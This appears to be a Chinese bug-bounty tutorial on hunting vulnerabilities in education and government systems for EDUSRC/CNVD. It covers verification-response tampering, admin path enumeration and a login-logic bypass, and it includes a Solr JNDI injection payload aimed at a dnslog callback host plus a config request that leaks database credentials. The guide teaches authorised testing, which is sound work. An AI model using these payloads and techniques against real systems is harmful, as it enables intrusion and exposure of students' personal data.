EDUSRC\/CNVD漏洞挖掘技巧深度解析<\/h1>

一、逻辑漏洞挖掘技巧<\/h2>

1. 密码重置\/登录功能逻辑漏洞<\/h3>

典型漏洞模式：<\/strong><\/p>

不点击发送验证码，直接填写任意验证码<\/li>
修改返回包参数绕过验证：

success:false<\/code> → success:true<\/code><\/li>
errorMsg:"验证码错误"<\/code> → errorMsg:""<\/code><\/li>
将0改为1或false改为true<\/li> <\/ul> <\/li> <\/ul> 挖掘方法：<\/strong><\/p> 抓取请求包查看完整手机号<\/li> 尝试替换为自己手机号接收验证码<\/li> 观察返回包中敏感信息泄露（如管理员邮箱、手机号）<\/li> <\/ol> 2. 垂直越权漏洞<\/h3> 常见场景：<\/strong><\/p> 普通账号无功能权限，通过路径拼接访问特权接口<\/li> 典型可枚举路径： \/achievement \/exam \/score \/student \/archives \/admin \/manage \/chengji (拼音：成绩) \/dangan (拼音：档案) <\/code><\/pre> <\/li> <\/ul> 易发框架：<\/strong><\/p> 老式JSP\/Servlet系统：仅前端session校验<\/li> ThinkPHP 3\/5：默认路由宽松，缺少Auth中间件<\/li> <\/ul> 二、纯IP资产归属证明方法<\/h2> 1. 教育网资产证明<\/h3> 微步情报社区显示为"中国教育网"或学校单位<\/li> 搜索同C段IP，若存在教育单位ICP备案<\/li> <\/ul> 2. 政府\/事业单位资产证明<\/h3> 同C段存在相同性质单位（事业、机关）<\/li> 网段归属分析<\/li> <\/ul> 三、红队社工技巧<\/h2> 1. 通知公告信息收集<\/h3> 提取"全市"、"全省"等关键词进行资产探测<\/li> 搜索引擎语法：title="XXXXX"<\/code><\/li> 案例：通过公告发现全市学校摄像头系统未授权<\/li> <\/ul> 2. 数据脱敏绕过<\/h3> 看似脱敏数据，在修改处可查看完整信息<\/li> <\/ul> 四、供应链攻击案例<\/h2> 1. 登录口逻辑漏洞<\/h3> 漏洞特征：<\/strong><\/p> 输入admin+错误密码提示"账号未设置密码"<\/li> 输入不存在的账号提示"没有用户"<\/li> <\/ul> 渗透方法：<\/strong><\/p> 尝试触发系统内部缓存刷新\/状态初始化<\/li> 输入密码"1"引发逻辑分支错误<\/li> 后续可尝试常规密码如"admin123"<\/li> <\/ol> 漏洞本质：<\/strong><\/p> 验证逻辑与状态处理不同步<\/li> 可能原因：缓存\/副本延迟<\/li> 懒加载逻辑未刷新<\/li> <\/ul> <\/li> <\/ul> 2. 框架级漏洞利用<\/h3> 发现通用框架漏洞后，搜集同厂商其他系统<\/li> 典型数据泄露：学生档案（数十万条）<\/li> 父母工作单位信息<\/li> 户口本、房产证等敏感信息<\/li> <\/ul> <\/li> <\/ul> 五、Solr漏洞利用<\/h2> 1. 经典漏洞<\/h3> \/solr\/admin\/cores?action=${jndi:ldap:\/\/xxxxxl.dnslog.cn} <\/code><\/pre> 2. 防御绕过<\/h3> 使用无害参数读取配置：<\/li> <\/ul> \/solr\/bookcontent_core\/dataimport?command=show-config <\/code><\/pre> 可获取数据库类型、IP、端口、账号密码等<\/li> <\/ul> 六、Token持久性测试<\/h2> 测试方法：<\/strong><\/p> 大型系统使用子系统接口拼接URL<\/li> 新浏览器直接打开测试未授权：<\/li> <\/ul> xxxxx\/xxxxxxxxx\/index.html#\/index?token=84e27aab-c89d-4fd3-a898-e82709821913 <\/code><\/pre> 渗透测试伦理声明<\/h2> 所有漏洞案例均已提交平台修复<\/li> 敏感信息已做脱敏处理<\/li> 技术仅用于安全研究与授权测试<\/li> 不支持、不鼓励任何非法攻击行为<\/li> 倡导以攻促防、依法研究、技术向善<\/li> <\/ol> 漏洞挖掘方法论总结<\/h2> 关注基础逻辑<\/strong>：从简单的密码重置、登录功能入手<\/li> 系统架构理解<\/strong>：识别JSP、ThinkPHP等易漏洞框架<\/li> 信息收集关键<\/strong>：充分利用公告、备案等公开信息<\/li> 供应链思维<\/strong>：从单个系统扩展到整个框架<\/li> 自动化辅助<\/strong>：合理使用工具进行批量检测<\/li> 漏洞验证严谨<\/strong>：确保漏洞可复现且影响明确<\/li> <\/ol> 通过系统性地应用这些技巧，可以在授权测试中发现更多安全隐患，帮助提升整体安全防护水平。<\/p>